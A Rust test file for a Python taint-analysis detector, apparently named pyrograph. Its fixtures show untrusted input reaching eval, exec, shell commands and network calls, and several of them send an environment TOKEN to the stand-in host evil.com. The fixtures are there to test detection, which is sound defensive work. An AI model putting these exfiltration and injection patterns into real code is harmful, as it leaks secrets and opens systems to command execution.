#![cfg(feature = "python")]
use pyrograph::{analyze, parse::parse_python};
/// Parses `source` as a Python file named `{name}.py`, runs the analysis on the
/// resulting graph, and panics unless at least one finding is reported.
///
/// Also panics (via `unwrap`) if parsing or analysis itself fails.
fn assert_detects(name: &str, source: &str) {
    let file_name = format!("{name}.py");
    let parsed = parse_python(source, &file_name).unwrap();
    let reported = analyze(&parsed).unwrap();
    let nothing_reported = reported.is_empty();
    assert!(!nothing_reported, "expected finding for {name}");
}
/// Parses `source` as a Python file named `{name}.py`, runs the analysis on the
/// resulting graph, and panics if any finding is reported.
///
/// The unexpected findings are included in the panic message. Also panics
/// (via `unwrap`) if parsing or analysis itself fails.
fn assert_clean(name: &str, source: &str) {
    let file_name = format!("{name}.py");
    let parsed = parse_python(source, &file_name).unwrap();
    let findings = analyze(&parsed).unwrap();
    let is_clean = findings.is_empty();
    assert!(is_clean, "unexpected finding for {name}: {findings:?}");
}
/// An `os.environ[...]` value stored in a variable and passed to `eval` must be reported.
#[test]
fn tp_01_os_environ_to_eval() {
    let source = concat!(
        "import os\n",
        "payload = os.environ['PAYLOAD']\n",
        "eval(payload)\n",
    );
    assert_detects("tp_01_os_environ_to_eval", source);
}
/// An `os.getenv(...)` value stored in a variable and passed to `exec` must be reported.
#[test]
fn tp_02_os_getenv_to_exec() {
    let source = concat!(
        "import os\n",
        "cmd = os.getenv('CMD')\n",
        "exec(cmd)\n",
    );
    assert_detects("tp_02_os_getenv_to_exec", source);
}
/// `sys.argv[1]` passed directly to `subprocess.run(..., shell=True)` must be reported.
#[test]
fn tp_03_sys_argv_to_subprocess_run() {
    let source = concat!(
        "import sys, subprocess\n",
        "subprocess.run(sys.argv[1], shell=True)\n",
    );
    assert_detects("tp_03_sys_argv_to_subprocess_run", source);
}
/// File contents obtained via `open(...).read()` and passed to `eval` must be reported.
#[test]
fn tp_04_open_read_to_eval() {
    let source = concat!(
        "payload = open('payload.py').read()\n",
        "eval(payload)\n",
    );
    assert_detects("tp_04_open_read_to_eval", source);
}
/// `Path(...).read_text()` (with `Path` imported from `pathlib`) passed to `exec` must be reported.
#[test]
fn tp_05_path_read_text_to_exec() {
    let source = concat!(
        "from pathlib import Path\n",
        "code = Path('payload.py').read_text()\n",
        "exec(code)\n",
    );
    assert_detects("tp_05_path_read_text_to_exec", source);
}
/// Flask `request.form[...]` passed to `subprocess.call(..., shell=True)` must be reported.
#[test]
fn tp_06_request_form_to_subprocess_call() {
    let source = concat!(
        "from flask import request\n",
        "import subprocess\n",
        "subprocess.call(request.form['cmd'], shell=True)\n",
    );
    assert_detects("tp_06_request_form_to_subprocess_call", source);
}
/// Flask `request.args.get(...)` stored in a variable and passed to `requests.get` must be reported.
#[test]
fn tp_07_request_args_get_to_requests_get() {
    let source = concat!(
        "from flask import request\n",
        "import requests\n",
        "url = request.args.get('next')\n",
        "requests.get(url)\n",
    );
    assert_detects("tp_07_request_args_get_to_requests_get", source);
}
/// Flask `request.json[...]` passed to an imported `urlopen` must be reported.
#[test]
fn tp_08_request_json_to_urlopen() {
    let source = concat!(
        "from flask import request\n",
        "from urllib.request import urlopen\n",
        "urlopen(request.json['url'])\n",
    );
    assert_detects("tp_08_request_json_to_urlopen", source);
}
/// An `input()` value stored in a variable and passed to `os.system` must be reported.
#[test]
fn tp_09_input_to_os_system() {
    let source = concat!(
        "import os\n",
        "cmd = input()\n",
        "os.system(cmd)\n",
    );
    assert_detects("tp_09_input_to_os_system", source);
}
/// An `input()` value stored in a variable and passed to `compile` must be reported.
#[test]
fn tp_10_input_to_compile() {
    let source = concat!(
        "src = input()\n",
        "compile(src, '<stdin>', 'exec')\n",
    );
    assert_detects("tp_10_input_to_compile", source);
}
/// File contents obtained via `open(...).read()` and passed to `pickle.loads` must be reported.
#[test]
fn tp_11_open_read_to_pickle_loads() {
    let source = concat!(
        "import pickle\n",
        "blob = open('payload.pickle').read()\n",
        "pickle.loads(blob)\n",
    );
    assert_detects("tp_11_open_read_to_pickle_loads", source);
}
/// `os.environ[...]` passed directly to `requests.post` must be reported.
#[test]
fn tp_12_os_environ_to_requests_post() {
    let source = concat!(
        "import os, requests\n",
        "requests.post(os.environ['EXFIL_URL'])\n",
    );
    assert_detects("tp_12_os_environ_to_requests_post", source);
}
/// `sys.argv[1]` passed to `connect` on a `socket.socket()` instance must be reported.
#[test]
fn tp_13_sys_argv_to_socket_connect() {
    let source = concat!(
        "import sys, socket\n",
        "client = socket.socket()\n",
        "client.connect(sys.argv[1])\n",
    );
    assert_detects("tp_13_sys_argv_to_socket_connect", source);
}
/// Flask `request.form[...]` passed to `os.popen` must be reported.
#[test]
fn tp_14_request_form_to_os_popen() {
    let source = concat!(
        "from flask import request\n",
        "import os\n",
        "os.popen(request.form['cmd'])\n",
    );
    assert_detects("tp_14_request_form_to_os_popen", source);
}
/// Flask `request.args[...]` passed to `subprocess.check_output(..., shell=True)` must be reported.
#[test]
fn tp_15_request_args_to_check_output() {
    let source = concat!(
        "from flask import request\n",
        "import subprocess\n",
        "subprocess.check_output(request.args['cmd'], shell=True)\n",
    );
    assert_detects("tp_15_request_args_to_check_output", source);
}
/// Flask `request.json.get(...)` passed to `subprocess.Popen(..., shell=True)` must be reported.
#[test]
fn tp_16_request_json_get_to_popen() {
    let source = concat!(
        "from flask import request\n",
        "import subprocess\n",
        "subprocess.Popen(request.json.get('cmd'), shell=True)\n",
    );
    assert_detects("tp_16_request_json_get_to_popen", source);
}
/// An `input()` value written through a handle returned by `open(..., 'w')` must be reported.
#[test]
fn tp_17_input_to_open_write() {
    let source = concat!(
        "data = input()\n",
        "handle = open('drop.txt', 'w')\n",
        "handle.write(data)\n",
    );
    assert_detects("tp_17_input_to_open_write", source);
}
/// `pathlib.Path(...).read_text()` (module-qualified form) passed to `exec` must be reported.
#[test]
fn tp_18_pathlib_module_read_text() {
    let source = concat!(
        "import pathlib\n",
        "payload = pathlib.Path('payload.py').read_text()\n",
        "exec(payload)\n",
    );
    assert_detects("tp_18_pathlib_module_read_text", source);
}
/// `getenv` imported by name from `os` and passed on to `eval` must be reported.
#[test]
fn tp_19_imported_getenv_alias() {
    let source = concat!(
        "from os import getenv\n",
        "code = getenv('PAYLOAD')\n",
        "eval(code)\n",
    );
    assert_detects("tp_19_imported_getenv_alias", source);
}
/// Flask `request.args[...]` passed to `run` imported by name from `subprocess` must be reported.
#[test]
fn tp_20_imported_run_alias() {
    let source = concat!(
        "from flask import request\n",
        "from subprocess import run\n",
        "run(request.args['cmd'], shell=True)\n",
    );
    assert_detects("tp_20_imported_run_alias", source);
}
/// `sys.argv[1]` wrapped in `int(...)` before reaching `subprocess.run` must produce no findings.
#[test]
fn fp_01_int_sanitizes_cli_to_exec() {
    let source = concat!(
        "import sys, subprocess\n",
        "value = int(sys.argv[1])\n",
        "subprocess.run(value)\n",
    );
    assert_clean("fp_01_int_sanitizes_cli_to_exec", source);
}
/// `input()` wrapped in `float(...)` before reaching `os.system` must produce no findings.
#[test]
fn fp_02_float_sanitizes_input_to_system() {
    let source = concat!(
        "import os\n",
        "value = float(input())\n",
        "os.system(value)\n",
    );
    assert_clean("fp_02_float_sanitizes_input_to_system", source);
}
/// Flask `request.args[...]` wrapped in `str(...)` before reaching `requests.get` must produce no findings.
#[test]
fn fp_03_str_sanitizes_request_to_network() {
    let source = concat!(
        "from flask import request\n",
        "import requests\n",
        "url = str(request.args['next'])\n",
        "requests.get(url)\n",
    );
    assert_clean("fp_03_str_sanitizes_request_to_network", source);
}
/// Flask `request.form[...]` passed through `bleach.clean` before `exec` must produce no findings.
#[test]
fn fp_04_bleach_clean_stops_exec() {
    let source = concat!(
        "from flask import request\n",
        "from bleach import clean\n",
        "exec(clean(request.form['code']))\n",
    );
    assert_clean("fp_04_bleach_clean_stops_exec", source);
}
/// Flask `request.args[...]` passed through `markupsafe.escape` before `compile` must produce no findings.
#[test]
fn fp_05_markupsafe_escape_stops_compile() {
    let source = concat!(
        "from flask import request\n",
        "from markupsafe import escape\n",
        "compile(escape(request.args['code']), '<x>', 'exec')\n",
    );
    assert_clean("fp_05_markupsafe_escape_stops_compile", source);
}
/// `sys.argv[1]` passed through `shlex.quote` before `os.system` must produce no findings.
#[test]
fn fp_06_shlex_quote_stops_command_injection() {
    let source = concat!(
        "import os, sys\n",
        "from shlex import quote\n",
        "os.system(quote(sys.argv[1]))\n",
    );
    assert_clean("fp_06_shlex_quote_stops_command_injection", source);
}
/// Flask `request.args[...]` passed through `os.path.basename` before a file write must produce no findings.
#[test]
fn fp_07_basename_stops_path_flow() {
    let source = concat!(
        "from flask import request\n",
        "from os.path import basename\n",
        "handle = open('drop.txt', 'w')\n",
        "handle.write(basename(request.args['path']))\n",
    );
    assert_clean("fp_07_basename_stops_path_flow", source);
}
/// `requests.get` called with a string literal must produce no findings.
#[test]
fn fp_08_constant_requests_get_is_clean() {
    let source = concat!(
        "import requests\n",
        "requests.get('https://example.com')\n",
    );
    assert_clean("fp_08_constant_requests_get_is_clean", source);
}
/// `subprocess.run` called with a string literal must produce no findings.
#[test]
fn fp_09_constant_subprocess_run_is_clean() {
    let source = concat!(
        "import subprocess\n",
        "subprocess.run('ls')\n",
    );
    assert_clean("fp_09_constant_subprocess_run_is_clean", source);
}
/// Flask `request.args[...]` that is only passed to `print` must produce no findings.
#[test]
fn fp_10_request_print_only_is_clean() {
    let source = concat!(
        "from flask import request\n",
        "value = request.args['x']\n",
        "print(value)\n",
    );
    assert_clean("fp_10_request_print_only_is_clean", source);
}
/// An `os.environ[...]` value interpolated into an f-string URL and passed to
/// `requests.get` must be reported.
///
/// The fixture imports `os` alongside `requests` so that the `os.environ`
/// reference is valid Python, matching the other fixtures in this file.
#[test]
fn tp_fstring_exfiltration() {
    assert_detects(
        "tp_fstring_exfiltration",
        r#"
import os, requests
secret = os.environ['TOKEN']
requests.get(f'https://evil.com/?leak={secret}')
"#,
    );
}
/// An `os.environ[...]` value passed as a positional argument to `str.format`,
/// with the result sent to `requests.get`, must be reported.
///
/// The fixture imports `os` alongside `requests` so that the `os.environ`
/// reference is valid Python, matching the other fixtures in this file.
#[test]
fn tp_format_direct_arg_exfiltration() {
    assert_detects(
        "tp_format_direct_arg_exfiltration",
        r#"
import os, requests
secret = os.environ['TOKEN']
url = 'https://evil.com/?leak={}'.format(secret)
requests.get(url)
"#,
    );
}
/// An `os.environ[...]` value reaching a URL through `.format(**locals())`,
/// with the result sent to `requests.get`, must be reported.
///
/// The fixture imports `os` alongside `requests` so that the `os.environ`
/// reference is valid Python, matching the other fixtures in this file.
#[test]
fn tp_format_locals_unpack_exfiltration() {
    assert_detects(
        "tp_format_locals_unpack_exfiltration",
        r#"
import os, requests
secret = os.environ['TOKEN']
url = 'https://evil.com/?leak={secret}'.format(**locals())
requests.get(url)
"#,
    );
}
/// An `os.environ[...]` value reaching a URL through `.format_map(locals())`,
/// with the result sent to `requests.get`, must be reported.
///
/// The fixture imports `os` alongside `requests` so that the `os.environ`
/// reference is valid Python, matching the other fixtures in this file.
#[test]
fn tp_format_map_locals_exfiltration() {
    assert_detects(
        "tp_format_map_locals_exfiltration",
        r#"
import os, requests
secret = os.environ['TOKEN']
url = 'https://evil.com/?leak={secret}'.format_map(locals())
requests.get(url)
"#,
    );
}
/// `os.environ` unpacked directly into `.format(**os.environ)`, with the
/// result sent to `requests.get`, must be reported.
#[test]
fn tp_format_os_environ_unpack_exfiltration() {
    // The fixture starts with a blank line, as in the raw-string form.
    let source = concat!(
        "\n",
        "import os, requests\n",
        "url = 'https://evil.com/?leak={HOME}'.format(**os.environ)\n",
        "requests.get(url)\n",
    );
    assert_detects("tp_format_os_environ_unpack_exfiltration", source);
}
/// When the only environment-derived local has been passed through `int(...)`,
/// a URL built with `.format(**locals())` and sent to `os.system` must produce
/// no findings.
///
/// The sanitized local is named `port` so that it matches the `{port}`
/// placeholder in the template; otherwise the fixture would not actually
/// format the sanitized value (and would raise `KeyError` if executed).
#[test]
fn fp_format_locals_all_sanitized() {
    assert_clean(
        "fp_format_locals_all_sanitized",
        r#"
import os
port = int(os.environ.get('PORT', '8080'))
url = 'https://example.com/{port}'.format(**locals())
os.system(url)
"#,
    );
}